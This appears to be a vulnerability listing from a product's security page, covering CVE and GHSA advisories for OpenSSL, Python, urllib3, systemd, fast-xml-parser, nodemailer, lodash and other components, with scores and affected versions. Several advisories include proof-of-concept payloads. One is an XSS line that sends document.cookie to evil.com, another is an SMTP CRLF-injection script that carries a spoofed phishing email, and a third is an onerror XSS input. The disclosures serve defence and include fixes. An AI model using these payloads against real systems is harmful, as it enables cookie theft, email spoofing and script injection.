    CVE-2026-28390Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.MEDIUM

    NVD: 7.5

    RedHat: 7.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    CVE-2026-2100A flaw was found in p11-kit. A remote attacker could exploit this vulnerability by calling the C_DeriveKey function on a remote token with specific IBM kyber or IBM btc derive mechanism parameters set to NULL. This could lead to the RPC-client attempting to return an uninitialized value, potentially resulting in a NULL dereference or undefined behavior. This issue may cause an application level denial of service or other unpredictable system states.MEDIUM

    NVD: 7.5

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-11468When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.MEDIUM

    NVD: n/a

    RedHat: 4.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-12781When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the "base64" module the characters "+/" will always be accepted, regardless of the value of "altchars" parameter, typically used to establish an "alternative base64 alphabet" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues. This behavior can only be insecure if your application uses an alternate base64 alphabet (without "+/"). If your application does not use the "altchars" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet. The attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python. Users are recommended to mitigate by verifying user-controlled inputs match the base64 alphabet they are expecting or verify that their application would not be affected if the b64decode() functions accepted "+" or "/" outside of altchars.MEDIUM

    NVD: 5.3

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-13837When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issuesMEDIUM

    NVD: 5.5

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-15282User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.MEDIUM

    NVD: n/a

    RedHat: 4.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-4516There is an issue in CPython when using `bytes.decode("unicode_escape", error="ignore|replace")`. If you are not using the "unicode_escape" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.MEDIUM

    NVD: n/a

    RedHat: 5.1

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-0672When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters.MEDIUM

    NVD: n/a

    RedHat: 4.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-1502CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.MEDIUM

    NVD: n/a

    RedHat: 4.5

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-3644The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().MEDIUM

    NVD: n/a

    RedHat: 5.4

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-4224When an Expat parser with a registered ElementDeclHandler parses an inline document type definition containing a deeply nested content model a C stack overflow occurs.MEDIUM

    NVD: n/a

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-5713The "profiling.sampling" module (Python 3.15+) and "asyncio introspection capabilities" (3.14+, "python -m asyncio ps" and "python -m asyncio pstree") features could be used to read and write addresses in a privileged process if that process connected to a malicious or "infected" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.MEDIUM

    NVD: n/a

    RedHat: 6

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-6019http.cookies.Morsel.js_output() returns an inline <script> snippet and only escapes " for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence </script> inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.MEDIUM

    NVD: n/a

    RedHat: 6.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2023-45803urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.MEDIUM

    NVD: 4.2

    RedHat: 4.2

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-50181urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.MEDIUM

    NVD: 6.1

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2025-50182urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.MEDIUM

    NVD: 6.1

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-25645Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.MEDIUM

    NVD: 5.5

    RedHat: 4.7

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-32284The msgpack decoder fails to properly validate the input buffer length when processing truncated fixext data (format codes 0xd4-0xd8). This can lead to an out-of-bounds read and a runtime panic, allowing a denial of service attack.MEDIUM

    NVD: n/a

    RedHat: 5.9

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-29111systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On version v249 and older the effect is not an assert, but stack overwriting, with the attacker controlled content. From version v250 and newer this is not possible as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available.MEDIUM

    NVD: n/a

    RedHat: 7.8

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 8.17.7
    CVE-2026-4105A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.MEDIUM

    NVD: n/a

    RedHat: 6.7

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-34743XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.MEDIUM

    NVD: 5.3

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.19.15
    • 8.19.14
    • 8.19.13
    • 8.19.12
    • 8.19.11
    CVE-2026-2739This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.MEDIUM

    NVD: n/a

    RedHat: 5.3

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.3.3
    • 8.3.2
    • 8.3.1
    • 8.3.0
    • 8.2.3
    CVE-2026-41650# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters ## Summary fast-xml-parser XMLBuilder does not escape the `-->` sequence in comment content or the `]]>` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. Existing CVEs for fast-xml-parser cover different issues: - CVE-2023-26920: Prototype pollution (parser) - CVE-2023-34104: ReDoS (parser) - CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder - CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities This finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability. ## Vulnerable Code **File**: `src/fxb.js` ```javascript // Line 442 - Comment building with NO escaping of --> buildTextValNode(val, key, attrStr, level) { // ... if (key === this.options.commentPropName) { return this.indentate(level) + `<!--${val}-->` + this.newLine; // VULNERABLE } // ... if (key === this.options.cdataPropName) { return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine; // VULNERABLE } } ``` Compare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`. ## Proof of Concept ### Test 1: Comment Injection (XSS in SVG/HTML context) ```javascript import { XMLBuilder } from 'fast-xml-parser'; const builder = new XMLBuilder({ commentPropName: "#comment", format: true, suppressEmptyNode: true }); const xml = { root: { "#comment": "--><script>alert('XSS')</script><!--", data: "legitimate content" } }; console.log(builder.build(xml)); ``` **Output**: ```xml <root> <!----><script>alert('XSS')</script><!----> <data>legitimate content</data> </root> ``` ### Test 2: CDATA Injection (RSS feed) ```javascript const builder = new XMLBuilder({ cdataPropName: "#cdata", format: true, suppressEmptyNode: true }); const rss = { rss: { channel: { item: { title: "Article", description: { "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more" } }}} }; console.log(builder.build(rss)); ``` **Output**: ```xml <rss> <channel> <item> <title>Article</title> <description> <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]> </description> </item> </channel> </rss> ``` ### Test 3: SOAP Message Injection ```javascript const builder = new XMLBuilder({ commentPropName: "#comment", format: true }); const soap = { "soap:Envelope": { "soap:Body": { "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--", Action: "getBalance", UserId: "12345" } } }; console.log(builder.build(soap)); ``` **Output**: ```xml <soap:Envelope> <soap:Body> <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!----> <Action>getBalance</Action> <UserId>12345</UserId> </soap:Body> </soap:Envelope> ``` The injected `<Action>deleteAll</Action>` appears as a real SOAP action element. ## Tested Output All tests run on Node.js v22, fast-xml-parser v5.5.12: ``` 1. COMMENT INJECTION: Injection successful: true 2. CDATA INJECTION (RSS feed scenario): Injection successful: true 4. Round-trip test: Injection present: true 5. SOAP MESSAGE INJECTION: Contains injected Action: true ``` ## Impact An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can: 1. **XSS**: Inject `<script>` tags into XML/SVG/HTML documents served to browsers 2. **SOAP injection**: Modify SOAP message structure by injecting XML elements 3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout 4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files). ## Suggested Fix Escape delimiters in comment and CDATA content: ```javascript // For comments: replace -- with escaped equivalent if (key === this.options.commentPropName) { const safeVal = String(val).replace(/--/g, '&#45;&#45;'); return this.indentate(level) + `<!--${safeVal}-->` + this.newLine; } // For CDATA: split on ]]> and rejoin with separate CDATA sections if (key === this.options.cdataPropName) { const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>'); return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine; } ```MEDIUM

    NVD: n/a

    RedHat: n/a

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 8.16.6
    • 8.16.5
    • 8.16.4
    • 8.16.3
    • 8.16.2
    GHSA-r4q5-vmmm-2653## Summary When an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target. Since `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem. ## Affected Code `index.js`, lines 469-476: ```javascript if (redirectUrl.protocol !== currentUrlParts.protocol && redirectUrl.protocol !== "https:" || redirectUrl.host !== currentHost && !isSubdomain(redirectUrl.host, currentHost)) { removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers); } ``` The regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched. ## Attack Scenario 1. App uses axios with custom auth header: `headers: { 'X-API-Key': 'sk-live-secret123' }` 2. Server returns `302 Location: https://evil.com/steal` 3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com` 4. Attacker captures the API key ## Impact Any custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js. ## Suggested Fix Add a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect. ## Disclosure Source code review, manually verified. Found 2026-03-20.MEDIUM

    NVD: n/a

    RedHat: n/a

    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
      CVE-2026-42338### Summary `Address6.group()` and `Address6.link()` do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and `AddressError.parseMessage` (emitted by the `Address6` constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to `Address6` and (2) renders the output of these methods, or the thrown error's `parseMessage`, as HTML (e.g. via `innerHTML`) is vulnerable to cross-site scripting. A related issue in `v6.helpers.spanAll()` produced malformed markup but was not exploitable; it is hardened in the same release for consistency. ### Details Four related issues were identified and fixed together: 1. **`Address6.group()`: zone ID injection.** The `Address6` constructor stores the raw input (including any IPv6 zone ID) in `this.address` before zone stripping. `group()` then passed `this.address` to `helpers.simpleGroup()`, which wrapped each `:`-separated segment in a `<span>` element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim. 2. **`Address6.link({ prefix, className })`: attribute-value injection.** `link()` concatenated user-supplied `prefix` and `className` into the `href="…"` and `class="…"` attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g. `onmouseover`) and achieve XSS. 3. **`Address6` constructor: leading-zero IPv4 error path.** The leading-zero branch in `parse4in6()` built `AddressError.parseMessage` by concatenating the raw address through `String.replace()`. Because `parse4in6()` runs before the bad-character check, any characters in the groups preceding the IPv4 suffix flowed into the error's HTML unescaped. Consumers who render `parseMessage` as HTML (its documented purpose — it already contains `<span class="parse-error">` markup) could be XSS'd by a crafted input such as `<img src=x onerror=alert(1)>:10.0.01.1`. 4. **`v6.helpers.spanAll()`: attribute-value injection (defense in depth).** `spanAll()` embedded each character of its input into a `class="digit value-${n} …"` attribute without escaping. Because `split('')` limits `n` to a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency. ### Affected Versions All versions up to and including `10.1.0`. ### Patched Version `10.1.1`. ### Impact Real-world exposure is believed to be extremely limited. Analysis of all 425 dependent npm packages as well as GitHub code search found zero consumers of `group()`, `link()`, or `spanAll()`: these HTML-emitting surfaces appear to be unused across published npm packages and public repositories. Applications using only the address-parsing and comparison APIs (`isValid`, `correctForm`, `isInSubnet`, `bigInt`, etc.) are not affected. Consumers who **do** render the output of `group()`, `link()`, `spanAll()`, or `AddressError.parseMessage` as HTML against untrusted input should upgrade. ### PoC ```javascript const { Address6 } = require('ip-address'); const addr = new Address6('fe80::1%<img src=x onerror=alert(1)>'); document.body.innerHTML = addr.group(); // fires the onerror handler in 10.1.0 ``` ### Workarounds If users cannot upgrade immediately: - Do not pass untrusted input to the `Address6` constructor, or - Never render the output of `group()`, `link()`, or `spanAll()`, nor the `parseMessage` field of any thrown `AddressError`, as HTML; treat these values as text only, or run them through [DOMPurify](https://github.com/cure53/DOMPurify) before inserting into the DOM (DOMPurify's default configuration preserves the library's intended `<span>` wrapping while stripping any injected event handlers), or - Validate input with `Address6.isValid()` and reject anything that contains a zone identifier (a `%` character) or characters outside `[0-9a-fA-F:/]` before passing it to the constructor. ### Lack of separate CVEs Given the evidence that these methods are not used, and given that they are all of the same construction, maintainers do not think it's relevant or useful to create a separate CVE for each library method. ### Credit ip-address thanks @scovetta for reporting this issue.MEDIUM

      NVD: n/a

      RedHat: n/a

      • 9.4.0
      • 9.3.4
      • 9.3.3
      • 9.3.2
      • 9.3.1
      • 8.12.1
      • 8.12.0
      • 8.11.4
      • 8.11.3
      • 8.11.2
      CVE-2026-2950Impact: Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype. The issue permits deletion of prototype properties but does not allow overwriting their original behavior. Patches: This issue is patched in 4.18.0. Workarounds: None. Upgrade to the patched version.MEDIUM

      NVD: 5.3

      RedHat: 6.5

      • 9.4.0
      • 9.3.4
      • 9.3.3
      • 9.3.2
      • 9.3.1
        GHSA-vvjj-xcjg-gr5g### Summary Nodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\r\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks. ### Details The vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command: ```javascript // lib/smtp-connection/index.js, line 71 this.name = this.options.name || this._getHostname(); // line 1336 this._sendCommand('EHLO ' + this.name); ``` The `_sendCommand` method writes the string directly to the socket followed by `\r\n` (line 1082): ```javascript this._socket.write(Buffer.from(str + '\r\n', 'utf-8')); ``` If the `name` option contains `\r\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\r\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever. This is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending. The `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization. ### PoC ```javascript const nodemailer = require('nodemailer'); const net = require('net'); // Simple SMTP server to observe injected commands const server = net.createServer(socket => { socket.write('220 test ESMTP\r\n'); socket.on('data', data => { const lines = data.toString().split('\r\n').filter(l => l); lines.forEach(line => { console.log('SMTP CMD:', line); if (line.startsWith('EHLO') || line.startsWith('HELO')) socket.write('250 OK\r\n'); else if (line.startsWith('MAIL FROM')) socket.write('250 OK\r\n'); else if (line.startsWith('RCPT TO')) socket.write('250 OK\r\n'); else if (line === 'DATA') socket.write('354 Go\r\n'); else if (line === '.') socket.write('250 OK\r\n'); else if (line === 'QUIT') { socket.write('221 Bye\r\n'); socket.end(); } else if (line === 'RSET') socket.write('250 OK\r\n'); }); }); }); server.listen(0, '127.0.0.1', () => { const port = server.address().port; // Inject a complete phishing email via EHLO name const transport = nodemailer.createTransport({ host: '127.0.0.1', port: port, secure: false, name: 'legit.host\r\nMAIL FROM:<attacker@evil.com>\r\n' + 'RCPT TO:<victim@target.com>\r\nDATA\r\n' + 'From: ceo@company.com\r\nTo: victim@target.com\r\n' + 'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET' }); transport.sendMail({ from: 'legit@example.com', to: 'legit-recipient@example.com', subject: 'Normal email', text: 'Normal content' }, () => { server.close(); process.exit(0); }); }); ``` Running this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent. ### Impact **Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes: - Multi-tenant SaaS platforms with per-tenant SMTP configuration - Admin panels where SMTP hostname/name settings are stored in databases - Applications loading SMTP config from environment variables or external sources **What can an attacker do:** 1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands 2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion 3. **Conduct phishing attacks** using the legitimate SMTP server as a relay 4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO 5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN The injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context. **Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example: ```javascript this.name = (this.options.name || this._getHostname()).replace(/[\r\n]/g, ''); ```MEDIUM

        NVD: n/a

        RedHat: n/a

        • 9.4.0
        • 9.3.4
        • 9.3.3
        • 9.3.2
        • 9.3.1
          CVE-2024-53382Prism (aka PrismJS) through 1.29.0 allows DOM Clobbering (with resultant XSS for untrusted input that contains HTML but does not directly contain JavaScript), because document.currentScript lookup can be shadowed by attacker-injected HTML elements.MEDIUM

          NVD: 5.4

          RedHat: 4.9

          • 9.4.0
          • 9.3.4
          • 9.3.3
          • 9.3.2
          • 9.3.1
            CVE-2026-41907uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.12
            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            CVE-2026-33532`yaml` is a YAML parser and serialiser for JavaScript. Parsing a YAML document with a version of `yaml` on the 1.x branch prior to 1.10.3 or on the 2.x branch prior to 2.8.3 may throw a RangeError due to a stack overflow. The node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a `RangeError: Maximum call stack size exceeded` with a small payload (~2–10 KB). The `RangeError` is not a `YAMLParseError`, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application's exception handling, this can fail requests or terminate the Node.js process. Flow sequences allow deep nesting with minimal bytes (2 bytes per level: one `[` and one `]`). On the default Node.js stack, approximately 1,000–5,000 levels of nesting (2–10 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation). Note: the library's `Parser` (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion. All three public parsing APIs are affected: `YAML.parse()`, `YAML.parseDocument()`, and `YAML.parseAllDocuments()`. Versions 1.10.3 and 2.8.3 contain a patch.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.2.3
            • 8.2.2
            • 8.2.1
            • 8.2.0
            • 8.1.3
            CVE-2026-7168cross-proxy Digest auth state leakMEDIUM

            NVD: n/a

            RedHat: n/a

            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-2219It was discovered that dpkg-deb (a component of dpkg, the Debian package management system) does not properly validate the end of the data stream when uncompressing a zstd-compressed .deb archive, which may result in denial of service (infinite loop spinning the CPU).MEDIUM

            NVD: n/a

            RedHat: n/a

            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-27135nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. Prior to version 1.68.1, the nghttp2 library stops reading the incoming data when user facing public API `nghttp2_session_terminate_session` or `nghttp2_session_terminate_session2` is called by the application. They might be called internally by the library when it detects the situation that is subject to connection error. Due to the missing internal state validation, the library keeps reading the rest of the data after one of those APIs is called. Then receiving a malformed frame that causes FRAME_SIZE_ERROR causes assertion failure. nghttp2 v1.68.1 adds missing state validation to avoid assertion failure. No known workarounds are available.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.8
            • 9.4.0
            • 9.3.4
            • 8.18.2
            • 8.18.1
            • 8.18.0
            CVE-2026-5958When sed is invoked with both -i (in-place edit) and --follow-symlinks, the function open_next_file() performs two separate, non-atomic filesystem operations on the same path: 1. resolves symlink to its target and stores the resolved path for determining when output is written, 2. opens the original symlink path (not the resolved one) to read the file. Between these two calls there is a race window. If an attacker atomically replaces the symlink with a different target during that window, sed will: read content from the new (attacker-chosen) symlink target and write the processed result to the path recorded in step 1. This can lead to arbitrary file overwrite with attacker-controlled content in the context of the sed process. This issue was fixed in version 4.10.MEDIUM

            NVD: n/a

